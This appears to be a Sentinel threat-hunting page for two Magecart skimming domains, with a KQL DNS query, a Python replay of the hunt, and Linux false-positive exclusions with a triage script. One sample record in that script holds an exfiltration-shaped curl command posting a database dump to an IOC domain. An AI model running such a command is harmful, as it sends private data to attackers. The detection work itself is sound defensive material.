Magecart operators inject card-skimming JavaScript into legitimate e-commerce sites, frequently through a compromised third-party script or component, and exfiltrate payment data to attacker-controlled domains such as the two listed below. SOC teams should proactively hunt for these indicators in Azure Sentinel (Microsoft Sentinel): a host in the environment resolving one of these domains is a strong signal of either a compromised web property or a user browsing a skimmed checkout page, and catching it early limits how much card data leaves before the skimmer is removed.
IOC Summary
Malware Family: Magecart
Total IOCs: 2
IOC Types: domain
| Type | Value | Threat Type | First Seen | Confidence |
|---|---|---|---|---|
| domain | yellowtag.shop | cc_skimming | 2026-05-18 | 100% |
| domain | kopet.pics | cc_skimming | 2026-05-18 | 100% |
```kusto
// Hunt for DNS queries to known Magecart card-skimming domains
// Source: ThreatFox - magecart
// has_any matches whole terms, so subdomains of the IOC domains are also caught
let malicious_domains = dynamic(["yellowtag.shop", "kopet.pics"]);
DnsEvents
| where Name has_any (malicious_domains)
| project TimeGenerated, Computer, Name, IPAddresses, QueryType
| order by TimeGenerated desc
```
| Sentinel Table | Notes |
|---|---|
| DnsEvents | Populated by the DNS Analytics data connector; confirm the connector is enabled and the table is receiving events before relying on this hunt |
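The query above leans on `has_any`, and it is worth being precise about what that matches before trusting the results. The following Python is an added example, not part of the original page or the ThreatFox feed: it replays the hunt offline over a handful of constructed records shaped like `DnsEvents` rows (the hostnames, computers and addresses are made up; the IP addresses are from the RFC 5737 documentation ranges) and compares two matchers. `has_phrase` approximates Kusto's `has` semantics (the IOC's dot-separated terms must appear as a consecutive run of whole terms), so it catches subdomains and rejects near-misses such as `skopet.pics`, but it also fires on a lookalike where the IOC appears as a prefix of a longer name under someone else's registrable domain. `suffix_match` (what `Name =~ d or Name endswith strcat(".", d)` would express in KQL) flags only the IOC domain and its subdomains.

```python
"""Offline replay of the Magecart DnsEvents hunt with two domain matchers.

Added example; sample records are constructed, not real telemetry.
"""
import re

# IOC values from the ThreatFox magecart table on this page
MALICIOUS_DOMAINS = ("yellowtag.shop", "kopet.pics")

# Constructed records mirroring the DnsEvents columns the KQL projects.
SAMPLE_DNS_EVENTS = [
    {"TimeGenerated": "2026-05-18T09:14:02Z", "Computer": "web-edge-01",
     "Name": "yellowtag.shop", "IPAddresses": "203.0.113.10", "QueryType": "A"},
    {"TimeGenerated": "2026-05-18T10:02:45Z", "Computer": "kiosk-07",
     "Name": "static.kopet.pics", "IPAddresses": "198.51.100.7", "QueryType": "A"},
    # Lookalike: IOC appears as a prefix, but the registrable domain is example.net
    {"TimeGenerated": "2026-05-18T10:30:00Z", "Computer": "build-03",
     "Name": "yellowtag.shop.cdn.example.net", "IPAddresses": "192.0.2.44", "QueryType": "A"},
    # Near-miss: shares a substring with kopet.pics but is a different domain
    {"TimeGenerated": "2026-05-18T11:05:10Z", "Computer": "laptop-22",
     "Name": "skopet.pics", "IPAddresses": "192.0.2.9", "QueryType": "A"},
    {"TimeGenerated": "2026-05-18T11:20:00Z", "Computer": "laptop-22",
     "Name": "www.example.com", "IPAddresses": "192.0.2.1", "QueryType": "A"},
]


def normalize(name: str) -> str:
    """Lower-case and strip a trailing dot (FQDNs are sometimes logged as 'host.')."""
    return name.rstrip(".").lower()


def terms(value: str) -> list[str]:
    """Split into alphanumeric terms, the way Kusto tokenises text for `has`."""
    return [t for t in re.split(r"[^a-z0-9]+", normalize(value)) if t]


def has_phrase(name: str, ioc: str) -> bool:
    """Approximation of Kusto `has` for a dotted IOC: the IOC's terms must
    appear as a consecutive run of whole terms in the queried name."""
    n, p = terms(name), terms(ioc)
    return any(n[i:i + len(p)] == p for i in range(len(n) - len(p) + 1))


def suffix_match(name: str, ioc: str) -> bool:
    """Exact domain or a subdomain of it; rejects prefix lookalikes."""
    n, d = normalize(name), normalize(ioc)
    return n == d or n.endswith("." + d)


def hunt(events, iocs=MALICIOUS_DOMAINS, matcher=suffix_match):
    """Return matching events (newest first) with the IOC that fired, like the
    KQL's project/order by TimeGenerated desc."""
    hits = []
    for event in events:
        for ioc in iocs:
            if matcher(event["Name"], ioc):
                hits.append({**event, "MatchedIOC": ioc})
                break
    # ISO-8601 UTC timestamps sort correctly as strings
    return sorted(hits, key=lambda e: e["TimeGenerated"], reverse=True)


if __name__ == "__main__":
    for label, matcher in (("has_any-style", has_phrase), ("suffix", suffix_match)):
        print(f"== {label} matcher ==")
        for hit in hunt(SAMPLE_DNS_EVENTS, matcher=matcher):
            print(f"{hit['TimeGenerated']}  {hit['Computer']:<12} {hit['Name']:<32} -> {hit['MatchedIOC']}")
```

Run it once with each matcher and compare the two hit lists: the only difference should be the lookalike record. Whether that extra hit is noise or a lead depends on the engagement, but the analyst should know which behaviour the query has before scheduling it as an analytics rule.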
False Positive Scenarios

Legitimate administrative and automation activity on Linux hosts routinely uses the same transfer tools an attacker would use to stage or exfiltrate data. The scenarios below are the common benign patterns and the exclusions that keep them out of hunting results; each exclusion should be scoped as narrowly as the environment allows, because a broad allowlist for a tool name is exactly what an attacker hides behind.

- Scenario: Scheduled system backup using rsync
  - Description: A scheduled backup job uses rsync to transfer files to a remote backup server.
  - Filter/Exclusion: Exclude rsync commands executed during the known backup window or targeting the internal IP ranges used for backups. Where possible require both conditions together, since an rsync to the backup target outside its window is itself worth a look.
- Scenario: Admin task using wget to download configuration files
  - Description: An administrator uses wget to fetch updated configuration files from an internal repository.
  - Filter/Exclusion: Exclude wget commands whose URL points at internal hosts or known configuration management endpoints.
- Scenario: CI/CD pipeline artifact download using curl
  - Description: A CI/CD pipeline (e.g., Jenkins, GitLab CI) uses curl to download build artifacts from an internal artifact server.
  - Filter/Exclusion: Exclude curl commands to the internal artifact repositories, or those executed on runner hosts during CI/CD job execution.
- Scenario: Log collection using logrotate and rsync
  - Description: Log rotation hands off to rsync to move rotated logs to a central logging server.
  - Filter/Exclusion: Exclude rsync transfers to the known log aggregation servers, or those that run on the log rotation schedule.
- Scenario: Internal tool for threat intelligence feed updates
  - Description: A company-specific tool (e.g., threat-intel-updater) fetches and updates threat intelligence feeds from internal sources.
  - Filter/Exclusion: Exclude traffic to the internal threat intelligence feeds, or processes matching the internal tool's name or signature.
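The exclusions above are easy to state and easy to get wrong, typically by keying on the tool name alone. The following Python is an added example, not part of the original page: it applies the five exclusions as one triage function over constructed Linux process-execution records (the hostnames, command lines, `corp.example` domain, backup and log-aggregation addresses, and the 01:00 to 03:00 backup window are all assumptions made up for the example). Each exclusion is tied to the destination the command actually targets, pulled out of the command line, so an rsync to the backup target outside its window and a curl upload to an external host both survive triage.

```python
"""Apply the benign-scenario exclusions to constructed process-execution events.

Added example; all hosts, windows and command lines are constructed.
"""
import ipaddress
import re
from datetime import datetime, time
from urllib.parse import urlparse

# Environment assumptions (constructed for the example)
INTERNAL_NETWORKS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
INTERNAL_DOMAIN_SUFFIX = ".corp.example"
BACKUP_TARGETS = {"10.20.30.40"}
LOG_AGGREGATORS = {"10.20.30.50"}
BACKUP_WINDOW = (time(1, 0), time(3, 0))          # scheduled backup window, UTC
ALLOWLISTED_TOOLS = {"threat-intel-updater"}      # internal tool by process name
TRANSFER_TOOLS = {"rsync", "wget", "curl"}

SAMPLE_EVENTS = [
    {"Id": "E1", "TimeGenerated": "2026-05-18T02:05:00Z", "Computer": "backup-01", "ProcessName": "rsync",
     "CommandLine": "rsync -az /srv/data backup@10.20.30.40:/backups/srv"},
    {"Id": "E2", "TimeGenerated": "2026-05-18T14:12:00Z", "Computer": "backup-01", "ProcessName": "rsync",
     "CommandLine": "rsync -az /srv/data backup@10.20.30.40:/backups/srv"},          # right target, wrong time
    {"Id": "E3", "TimeGenerated": "2026-05-18T09:30:00Z", "Computer": "admin-ws", "ProcessName": "wget",
     "CommandLine": "wget -q https://repo.corp.example/configs/nginx.conf -O /etc/nginx/nginx.conf"},
    {"Id": "E4", "TimeGenerated": "2026-05-18T11:00:00Z", "Computer": "ci-runner-03", "ProcessName": "curl",
     "CommandLine": "curl -sSf https://artifacts.corp.example/builds/1234/app.tar.gz -o app.tar.gz"},
    {"Id": "E5", "TimeGenerated": "2026-05-18T03:30:00Z", "Computer": "app-01", "ProcessName": "rsync",
     "CommandLine": "rsync -a /var/log/ logs@10.20.30.50:/ingest/app-01/"},
    {"Id": "E6", "TimeGenerated": "2026-05-18T13:45:00Z", "Computer": "app-01", "ProcessName": "curl",
     "CommandLine": "curl -s -X POST --data-binary @/tmp/dump.sql https://yellowtag.shop/upload"},  # exfil-shaped
    {"Id": "E7", "TimeGenerated": "2026-05-18T08:00:00Z", "Computer": "ti-server", "ProcessName": "threat-intel-updater",
     "CommandLine": "threat-intel-updater --source https://feeds.corp.example/ioc"},
]

_HOST_PATH_RE = re.compile(r"^(?:[\w.-]+@)?([A-Za-z0-9.-]+):")   # rsync/scp style [user@]host:path


def destination_host(cmdline: str):
    """Pull the remote host out of a URL or an rsync-style host:path argument."""
    for tok in cmdline.split():
        if tok.startswith(("http://", "https://")):
            return urlparse(tok).hostname
        m = _HOST_PATH_RE.match(tok)
        if m:
            return m.group(1)
    return None


def is_internal(host: str) -> bool:
    """Internal by DNS suffix or by RFC 1918 address."""
    if host.lower().endswith(INTERNAL_DOMAIN_SUFFIX):
        return True
    try:
        return any(ipaddress.ip_address(host) in net for net in INTERNAL_NETWORKS)
    except ValueError:
        return False


def in_backup_window(timestamp: str) -> bool:
    t = datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%SZ").time()
    return BACKUP_WINDOW[0] <= t < BACKUP_WINDOW[1]


def benign_reason(event):
    """Return the matching exclusion, or None if the event should stay in the hunt results."""
    tool = event["ProcessName"]
    if tool in ALLOWLISTED_TOOLS:
        return "internal threat-intel tool"
    if tool not in TRANSFER_TOOLS:
        return None
    host = destination_host(event["CommandLine"])
    if host is None:
        return None
    if tool == "rsync":
        if host in BACKUP_TARGETS and in_backup_window(event["TimeGenerated"]):
            return "scheduled backup"
        if host in LOG_AGGREGATORS:
            return "log collection"
    if tool in ("wget", "curl") and is_internal(host):
        return "internal fetch"
    return None


def triage(events):
    """Events that survive every exclusion and should be reviewed."""
    return [e for e in events if benign_reason(e) is None]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(f"{e['Id']} {e['Computer']:<12} {e['ProcessName']:<22} -> {benign_reason(e) or 'REVIEW'}")
```

In Sentinel the same logic is expressed as `where not(...)` clauses over a watchlist of backup and aggregation hosts plus `hourofday(TimeGenerated)` for the window; the point of running it locally first is to confirm, on records you control, that the exclusions drop the five benign patterns and nothing else.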